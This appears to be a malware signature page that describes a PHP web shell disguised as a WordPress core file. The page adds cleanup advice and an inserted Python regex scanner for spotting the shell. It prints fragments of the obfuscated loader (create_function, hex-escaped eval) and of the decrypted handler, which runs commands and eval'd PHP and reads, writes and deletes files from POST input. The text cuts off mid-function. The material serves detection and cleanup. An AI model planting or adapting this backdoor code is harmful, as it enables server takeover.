Malware Signatures

php.backdoor.taxonomy.001

This malware category covers server-side malicious scripts that are commonly used as backdoors. Typical examples are file managers, web shells, tools for bypassing the admin login, and single-purpose scripts that let the attacker upload and run other malicious scripts. The payload is PHP based and therefore intended for server-side use: it is executed directly on the server while the site loads, so only the payload's result (such as a web shell interface) is visible in the browser, never the malicious code itself. Backdoors very commonly leave no visible sign in the site code, which makes them impossible to detect by accessing the infected site from outside; server-level analysis is necessary for an infection of this type.
php.backdoor.taxonomy is a simple web shell with a fairly strongly encrypted payload and a very good hiding technique. It mimics a standard WordPress file, with the structure and even the file header copied from legitimate WordPress files, and it is placed in core WordPress folders such as wp-includes, which makes it hard to identify. Its main function is named add_and_register_taxonomies(), which also suggests legitimate code.

Affecting

Any vulnerable PHP-based website. Outdated software or compromised passwords can act as the infection vector.

Cleanup

Inspect your site's files for suspicious use of fwrite functions or for files you don't recognize. You can also sign up with us and let our team remove the malware for you.

Dump

Part of the encrypted code:

function add_and_register_taxonomies() {
global $transl_dictionary;
$transl_dictionary = create_function('$inp,$key',"44163151....
if (!function_exists("O01100llO")) {
function O01100llO(){global $transl_dictionary;return call_user_func($transl_dictionary,'hg6h%3epBBh6%40%3cd.....
call_user_func(create_function('',"\x65\x76\x61l(\x4F01100llO());"));
}
}
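The cleanup advice and the loader fragment above give a defender concrete things to look for: the fake-core function name, create_function() fed a long encoded blob, create_function() handed straight to call_user_func(), "eval" spelled with \x escapes, and eval()/fwrite() driven from $_POST. As an added example (not part of this signature page), the following Python triage scanner flags PHP files containing those indicators; the regexes and the sample files it builds in a temporary wp-includes/ are constructed for illustration.

```python
import os
import re
import tempfile

# Constructed triage regexes for the indicators described in this signature; they are a
# first pass for finding candidate files, not a complete or authoritative detection rule.
INDICATORS = {
    "taxonomy_loader": re.compile(r"function\s+add_and_register_taxonomies\s*\("),
    "create_function_blob": re.compile(r"create_function\s*\(\s*'[^']*'\s*,\s*\"[0-9A-Za-z]{40,}"),
    "call_user_func_create_function": re.compile(r"call_user_func\s*\(\s*create_function\s*\("),
    "hex_escaped_eval": re.compile(r"\\x65\\x76\\x61l", re.IGNORECASE),
    "eval_of_post": re.compile(r"eval\s*\(\s*\$_POST\s*\["),
    "fwrite_of_post": re.compile(r"fwrite\s*\([^;]*\$_POST"),
}

def scan_source(text: str) -> list[str]:
    """Return the indicator names that fire on one file's contents, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_tree(root: str, exts=(".php", ".phtml", ".inc")) -> dict[str, list[str]]:
    """Walk a docroot (e.g. wp-includes) and map each flagged PHP file to its indicators."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if found := scan_source(fh.read()):
                        hits[path] = found
    return hits

# Constructed samples: a loader shaped like the encrypted fragment, a handler shaped like Main(), and a clean file.
SAMPLE_LOADER = r'''<?php
function add_and_register_taxonomies() {
global $transl_dictionary;
$transl_dictionary = create_function('$inp,$key',"4416315100112233445566778899aabbccddeeff0011");
call_user_func(create_function('',"\x65\x76\x61l(\x4F01100llO());"));
}
'''
SAMPLE_HANDLER = "<?php if (!empty($_POST['php'])) { eval($_POST['php']); } fwrite($fh, $_POST['data']);"
SAMPLE_CLEAN = "<?php function register_book_taxonomies() { register_taxonomy('genre', 'book'); }"

def demo() -> dict[str, list[str]]:
    """Write the samples into a temporary wp-includes/ and return flagged basenames."""
    with tempfile.TemporaryDirectory() as root:
        core = os.path.join(root, "wp-includes")
        os.makedirs(core)
        for fname, body in {"taxonomy.php": SAMPLE_LOADER, "class-cmd.php": SAMPLE_HANDLER,
                            "taxonomy-clean.php": SAMPLE_CLEAN}.items():
            with open(os.path.join(core, fname), "w", encoding="utf-8") as fh:
                fh.write(body)
        return {os.path.basename(p): v for p, v in scan_tree(root).items()}
```

Any file that matches deserves a manual review against a pristine copy of the same WordPress release rather than an automatic delete, since a single weak indicator such as fwrite() can also appear in legitimate plugin code.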

Part of decrypted code:

function Main()
{
$out = 'Failure';
if (!empty($_POST['cmd'])) {
$out = execute($_POST['cmd']);
} elseif (!empty($_POST['php'])) {
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
} elseif (!empty($_POST['dir'])) {
$dir = $_POST['dir'];
$out = dir_list($dir);
} elseif (!empty($_POST['local_path'])) {
$out = get_local_path();
} elseif (!empty($_POST['version'])) {
$out = get_version();
} elseif (!empty($_POST['read'])) {
$file = $_POST['read'];
$out = read($file);
} elseif (!empty($_POST['write'])) {
$out = write($_POST['write'], $_POST['data']);
} elseif (!empty($_POST['remove'])) {
$obj = $_POST['remove'];